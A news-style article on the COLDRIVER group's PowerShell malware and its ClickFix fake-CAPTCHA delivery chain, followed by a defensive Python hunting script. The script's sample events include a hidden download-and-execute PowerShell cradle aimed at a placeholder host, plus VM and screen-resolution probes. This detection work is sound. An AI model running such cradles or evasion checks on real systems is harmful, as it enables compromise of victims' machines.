Russia’s COLDRIVER Hackers Unveil New PowerShell Malware in Rapid Evolution of Cyber Tactics


A Russian Federal Security Service officer in assault gear.

A Russian state-sponsored cyber-espionage collective long focused on infiltrating policy and intelligence circles has revamped its tactics — refining its malware and constantly shifting its delivery chain to slip past defenses.

The group, tracked by Google Threat Intelligence Group (GTIG) as COLDRIVER, has moved away from its earlier Python-based backdoor in favour of a more streamlined PowerShell variant dubbed “Mayberobot”. This shift followed the public disclosure in May of another tool in its arsenal, LOSTKEYS, according to GTIG research published earlier this year.

Complex delivery chain, evolving quickly
Shortly after rolling out LOSTKEYS, the group rapidly deployed new malware families. In observed attacks, the initial access vector uses spoofed CAPTCHA pages: victims are prompted to “solve” a fake CAPTCHA that actually instructs them to copy a PowerShell command and execute it manually (a tactic often called “ClickFix”). That script then triggers a multi-stage download: the second stage checks for evasion conditions (for instance, the MD5 hash of the screen resolution) to determine whether it is running in a VM or sandbox; the third stage uses a VBScript decoder plus a two-key substitution cipher to unpack the final payload.

LOSTKEYS itself is engineered to steal documents from specific directories and collect information about system processes, before sending that data back to the attacker. The attacker’s infrastructure appears to make heavy use of unique identifiers, custom encryption keys and varied command-and-control servers per campaign, making attribution and tracking more difficult.

Why this matters
This evolution in tactics signals that even after exposure, COLDRIVER is rapidly adapting — refining its delivery mechanisms, bolstering evasion, and making the chain more obscure. As GTIG put it, the shift to more elaborate delivery chains “increases the difficulty of tracking their campaigns” — yet it also highlights how aggressively the actor is pursuing intelligence-gathering targets.

Background & targeting
COLDRIVER (also identified under names like Star Blizzard, Callisto and UNC4057) is tied to the Russian state intelligence apparatus — notably Federal Security Service (FSB) unit Centre 18. Its earlier focus was on credential theft via impersonation and phishing, aimed at high-value individuals in NGOs, governments and think-tanks, and at people with diplomatic or military backgrounds. More recently, the group has escalated to also deploying malware — a change from purely credential collection to direct system compromise.

Key take-aways for defenders

  • Be alert to fake CAPTCHA pages that ask for PowerShell commands to be pasted and executed. Such social engineering combined with manual execution is a strong red flag.

  • Multi-stage payloads that check device attributes (resolution, VM indicators) before downloading the final malware suggest sophisticated evasion.

  • The use of custom encryption keys per campaign means detection based on static signatures may be less effective; behavioural and chain-based detection approaches matter.

  • High-risk individuals (government advisers, think-tank staff, NGO personnel) should consider stronger protections (for example, hardware security keys, endpoint application control, minimizing script execution rights).

  • Monitoring and threat hunting should include indicators around credential theft, but also full device compromise — the actor is expanding its toolset beyond phishing for logins.
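The delivery chain described earlier (a PowerShell command pasted by the victim from a fake CAPTCHA page, followed by staged downloads gated on screen-resolution and VM checks) and the take-away above that behavioural, chain-based detection matters more than static signatures both point at the same hunt. The script below is an added example written for this article; it is not code from the article, from GTIG or from the malware. The event field names, the constructed sample events, the rule weights and the alert threshold are all assumptions, loosely modelled on Sysmon process-creation telemetry. It scores each PowerShell process on its own and then adds the score of its parent process, so a resolution probe that would be unremarkable by itself is raised when it descends from a shell-spawned, hidden, downloading PowerShell.

```python
"""Chain-aware hunt for a ClickFix-style PowerShell delivery chain.

Constructed example: field names, sample events, weights and threshold are
assumptions, not real COLDRIVER telemetry or GTIG detection logic.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Constructed process-creation events (assumed schema: pid, parent_pid, image,
# parent_image, command_line). Event 3 is a child of event 2.
SAMPLE_EVENTS: List[Event] = [
    {   # Benign: an administrator running a script from a console
        "id": 1, "pid": 100, "parent_pid": 90,
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1",
    },
    {   # ClickFix-style: explorer.exe spawns a hidden PowerShell that fetches a next stage
        "id": 2, "pid": 200, "parent_pid": 10,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/s)"',
    },
    {   # Second stage: probes screen resolution and machine class before continuing
        "id": 3, "pid": 300, "parent_pid": 200,
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -c "Add-Type -AssemblyName System.Windows.Forms; '
                        '[System.Windows.Forms.Screen]::PrimaryScreen.Bounds; '
                        'Get-CimInstance Win32_ComputerSystem"',
    },
]

# (rule name, weight, case-insensitive regex over the command line)
COMMAND_PATTERNS: List[Tuple[str, int, str]] = [
    ("hidden_window",    2, r"-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("policy_bypass",    2, r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass|-e(?:nc|ncodedcommand)?\s"),
    ("download_cradle",  2, r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b"),
    ("resolution_probe", 2, r"windows\.forms\.screen|win32_videocontroller|currenthorizontalresolution"),
    ("vm_probe",         1, r"win32_computersystem|win32_bios|hypervisor|vmware|virtualbox"),
]
ALERT_THRESHOLD = 5  # assumed tuning value


def is_powershell(image: str) -> bool:
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in ("powershell.exe", "pwsh.exe")


def spawned_from_explorer(event: Event) -> bool:
    # A pasted command (Win+R / shell) yields PowerShell whose parent is explorer.exe,
    # unlike scheduled tasks, installers or IDE-launched scripts.
    return is_powershell(str(event["image"])) and str(event["parent_image"]).lower().endswith("explorer.exe")


def score_event(event: Event) -> Tuple[int, List[str]]:
    """Score a single event in isolation; return (score, matched rule names)."""
    hits: List[str] = []
    score = 0
    if spawned_from_explorer(event):
        hits.append("powershell_from_explorer")
        score += 3
    if is_powershell(str(event["image"])):
        for name, weight, pattern in COMMAND_PATTERNS:
            if re.search(pattern, str(event["command_line"]), re.IGNORECASE):
                hits.append(name)
                score += weight
    return score, hits


def hunt(events: List[Event]) -> List[Tuple[int, int, List[str]]]:
    """Return (event id, chain score, hits) for events at or above the threshold.

    The chain score is the event's own score plus its parent's own score when the
    parent is in the same batch, which is what surfaces the low-scoring probe stage.
    """
    own = {int(e["pid"]): score_event(e) for e in events}
    alerts = []
    for e in events:
        score, hits = own[int(e["pid"])]
        parent = own.get(int(e["parent_pid"]))
        if parent:
            score += parent[0]
        if score >= ALERT_THRESHOLD:
            alerts.append((int(e["id"]), score, hits))
    return alerts


if __name__ == "__main__":
    for event_id, score, hits in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: score {score}, hits {hits}")
```

Run on the constructed batch, event 1 is silent, event 2 alerts on its own (explorer parent, hidden window, profile bypass, download cradle), and event 3 alerts only because it inherits its parent's score; on its own, a resolution or hardware query is too common in legitimate administration to page anyone. Tuning the weights and threshold against your own baseline of PowerShell parent-child pairs is the real work.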
